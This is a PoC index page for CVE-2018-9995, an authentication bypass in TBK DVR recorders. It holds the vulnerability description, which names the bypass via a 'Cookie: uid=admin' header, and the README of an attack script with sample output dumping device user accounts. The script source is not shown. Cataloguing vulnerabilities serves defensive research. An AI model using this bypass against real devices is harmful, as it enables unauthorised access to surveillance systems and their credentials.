POC details: 29e6b63bdff5b2842c9243e2e602bde312f184d1

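Source
Related vulnerability
Title: TBK DVR4104 and DVR4216 security vulnerability (CVE-2018-9995)
Description: TBK DVR4104 and DVR4216 are both high-definition digital video recorder devices. A security vulnerability exists in TBK DVR4104 and DVR4216. A remote attacker can exploit it to bypass authentication by means of the Cookie: uid=admin header.
Description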
Simple python3 script to automate CVE-2018-9995
Introduction
# DVR_Sploit
Simple python3 script to automate CVE-2018-9995

![dvrsploit](https://github.com/X3RX3SSec/DVR_Sploit/assets/141476851/7668e9ee-2881-4619-8903-4350a88334c0)

Requirements: requests (pip install requests)

Usage:

```
root@fuckmachine:~# python3 dvrsploit.py
Enter DVR host: 192.168.69.69
Enter DVR port: 88
Device list:
{"result":0,"list":[{"uid":"admin","pwd":"","role":2,"enmac":0,"mac":"00:00:00:00:00:00","playback":4294967295,"view":4294967295,"rview":4294967295,"ptz":4294967295,"backup":4294967295,"opt":4294967295}]}
Device list appended to dvr_output.txt
```
File snapshot

[4.0K] /data/pocs/29e6b63bdff5b2842c9243e2e602bde312f184d1
├── [ 45K] dvrsploit.jpg
├── [1.4K] dvrsploit.py
├── [ 34K] LICENSE
└── [ 576] README.md

0 directories, 4 files